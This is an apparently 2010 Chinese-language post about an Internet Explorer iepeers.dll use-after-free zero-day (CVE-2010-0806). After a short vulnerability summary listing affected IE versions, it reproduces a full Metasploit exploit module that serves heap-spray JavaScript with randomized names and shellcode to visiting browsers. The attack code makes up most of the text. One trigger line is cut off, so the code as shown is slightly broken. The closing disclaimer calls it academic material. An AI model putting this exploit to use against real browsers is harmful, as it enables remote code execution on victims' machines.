地下黑市熱賣IE 0day 漏洞 iepeers.dll

IE 0day 漏洞 iepeers.dll(網馬首選波及用戶較廣)
發表時間：2010-3-10
kb981374橙色預警
IE瀏覽器再現新0day漏洞，該漏洞可能允許遠程執行代碼，***利用該漏洞可以製造一個特別的頁面，再通過電子郵件、IM消息或其它欺騙的方式，誘使用 戶訪問這個特殊的頁面而觸發。
一 漏洞發展：
2010.3.10 微軟發佈安全公告kb981374，並表示要發佈額外補丁修復該漏洞（通常情況下，微軟只有特別嚴重的安全漏洞纔會啓動額外補丁發佈流程。）

二、漏洞簡述：
此IE新漏洞存在於iepeers.dll組件中，影響IE6/ie7  該漏洞已經在地下黑市交易，IE8不會受此漏洞影響。

三、漏洞影響：

1 主要影響用戶：
xp ie6/ie7用戶

2 可能受影響用戶
vista ie7保護模式減少影響
win2003 ie7受限模式可以減少影響

3 不受影響用戶
IE8用戶
win2000 ie5用戶

代碼:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
# Download Exploit Code
# Download N/A
view sourceprint?##  
# ie_iepeers_pointer.rb  
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework  
# Tested successfully on the following platforms:  
#  - Microsoft Internet Explorer 7, Windows Vista SP2  
#  - Microsoft Internet Explorer 7, Windows XP SP3  
#  - Microsoft Internet Explorer 6, Windows XP SP3  
# Exploit found in-the-wild. For additional details:  
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/  
# Trancer  
# http://www.rec-sec.com  

##

require ''msf/core''

class Metasploit3 < Msf::Exploit::Remote  

    Rank = GoodRanking  

    include Msf::Exploit::Remote::HttpServer::HTML

    def initialize(info = {})  

        super(update_info(info,  

            ''Name''           => ''Microsoft Internet Explorer iepeers.dll use-after-free'',  

            ''Description''    => %q{  

                This module exploits a use-after-free vulnerability within iepeers.dll of   

                Microsoft Internet Explorer versions 6 and 7.  

                NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.  

            },  

            ''License''        => MSF_LICENSE,  

            ''Author''         => [   

                        ''Trancer <mtrancer[at]gmail.com>''

                        ],   

            ''Version''        => ''$Revision:$'',  

            ''References''     =>  

                [  

                    [ ''CVE'', ''2010-0806'' ],  

                    [ ''OSVDB'', ''62810'' ],  

                    [ ''BID'', ''38615'' ],  

                    [ ''URL'', ''http://www.microsoft.com/technet/security/advisory/981374.mspx'' ],  

                    [ ''URL'', ''http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day

-attack-announced-cve-2010-0806/'' ]  

                ],  

            ''DefaultOptions'' =>  

                {  

                    ''EXITFUNC'' => ''process'',  

                    ''InitialAutoRunScript'' => ''migrate -f'',  

                },  

            ''Payload''        =>  

                {  

                    ''Space''         => 1024,  

                    ''BadChars''      => "\x00\x09\x0a\x0d''\\",      

                    ''StackAdjustment'' => -3500,  

                },  

            ''Platform''       => ''win'',  

            ''Targets''        =>  

                [  

                    [ ''Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0'', { ''Ret'' => 0x0C0C0C0C } ]      

                ],  

            ''DisclosureDate'' => ''Mar 09 2010'',  

            ''DefaultTarget''  => 0))  

    end
   
    def on_request_uri(cli, request) 

        # Re-generate the payload 

        return if ((p = regenerate_payload(cli)) == nil) 

        # Encode the shellcode 

        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) 

        # Set the return\nops 

        ret       = Rex::Text.to_unescape([target.ret].pack(''V'')) 

        # Randomize the javascript variable names 

        j_shellcode  = rand_text_alpha(rand(100) + 1) 

        j_nops       = rand_text_alpha(rand(100) + 1) 

        j_slackspace = rand_text_alpha(rand(100) + 1) 

        j_fillblock  = rand_text_alpha(rand(100) + 1) 

        j_memory     = rand_text_alpha(rand(100) + 1) 

        j_counter    = rand_text_alpha(rand(30) + 2) 

        j_ret        = rand_text_alpha(rand(100) + 1) 

        j_array      = rand_text_alpha(rand(100) + 1) 

        j_function1  = rand_text_alpha(rand(100) + 1) 

        j_function2  = rand_text_alpha(rand(100) + 1) 

        j_object     = rand_text_alpha(rand(100) + 1) 

        j_id         = rand_text_alpha(rand(100) + 1) 

        # Build out the message 

        html = %Q|<html><body> 

<button id=''#{j_id}'' style=''display:none''></button> 

<script language=''javascript''> 

function #{j_function1}(){ 

    var #{j_shellcode} = unescape(''#{shellcode}''); 

    #{j_memory} = new Array();  

    var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);  

    var #{j_nops} = unescape(''#{ret}'');  

    while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }  

    var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);  

    delete #{j_nops};  

    for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {  

        #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};  

    } 

} 

function #{j_function2}(){ 

    #{j_function1}();     

    var #{j_object} = document.createElement(''body''); 

    #{j_object}.addBehavior(''#default#userData''); 

    document.appendChild(#{j_object}); 

    try { 

        for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {  

            #{j_object}.setAttribute(''s'',window); 

        } 

    } catch(e){ }     

    window.status+=''''; 

} 

document.getElementById(''#{j_id}'').

</script></body></html>| 

        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 

        # Transmit the compressed response to the client 

        send_response(cli, html, { ''Content-Type'' => ''text/html'' }) 

        # Handle the payload 

        handler(cli) 
    end
end

PS:放出代碼的原因就是補丁已發佈,請大家及時打上否則你就慘了!

友情提示：該代碼具有危險性慎用!

 

鄭重聲明:本人提供BUG資料僅做學術交流之用，不承擔任何因此而引發的一系列法律責任，望周知！